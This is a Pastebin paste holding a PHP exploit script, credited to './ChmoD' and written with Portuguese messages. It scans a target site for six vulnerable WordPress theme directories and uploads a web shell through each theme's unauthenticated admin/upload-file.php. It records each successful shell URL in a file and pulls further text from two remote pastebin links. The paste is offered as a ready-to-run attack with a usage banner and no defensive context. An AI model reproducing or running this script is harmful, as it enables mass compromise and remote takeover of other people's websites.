Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################
- # Comando: #
- # root@ChmoD:~# php Exploit.php http://site.com/ #
- ###################################################
- <?php
- //Coded By ./ChmoD
- $target = $argv[1];
- if (!preg_match("~^(?:f|ht)tps?://~i", $target)) {
- $target = "http://" . $target;
- }
- $uploadfile="upload.php"; //shell upload
- $domain = explode("/", $target);
- $server_addr = gethostbyname($domain[2]);
- $list = array('/wp-content/themes/holding_pattern/',
- '/wp-content/themes/charity/',
- '/wp-content/themes/simpleCart/',
- '/wp-content/themes/micro/',
- '/wp-content/themes/evo/',
- '/wp-content/themes/gallery/');
- foreach($list as $dir){
- $headers = get_headers($target.$dir);
- if($headers[0] == 'HTTP/1.1 200 OK') {
- echo "[+]Encontrado ======>$dir: ";
- $tek = $target.$dir."/admin/upload-file.php";
- $ch = curl_init($tek);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_VERBOSE, false);
- curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
- curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- //print $postResult;
- if(preg_match("/success/",$postResult)) {
- echo "[*]Sucesso[*]\n[+]Shell Upada ======> ".$target.$dir."admin/upload.php";
- $f = fopen("shells.txt","a+");
- fwrite($f , "$target$dir"."admin/upload.php\n");
- fclose($f);
- }else{
- echo "Nao Exploitado\n";
- }
- $ChmoD = @file_get_contents("http://pastebin.com/raw.php?i=z3G4uyCN");
- $y = @file_get_contents("");
- echo "$y \n";
- $year = @file_get_contents("http://pastebin.com/raw.php?i=ufCi3rha");
- echo "$year \n";
- }
- }
- ?>
Add Comment
Please, Sign In to add comment
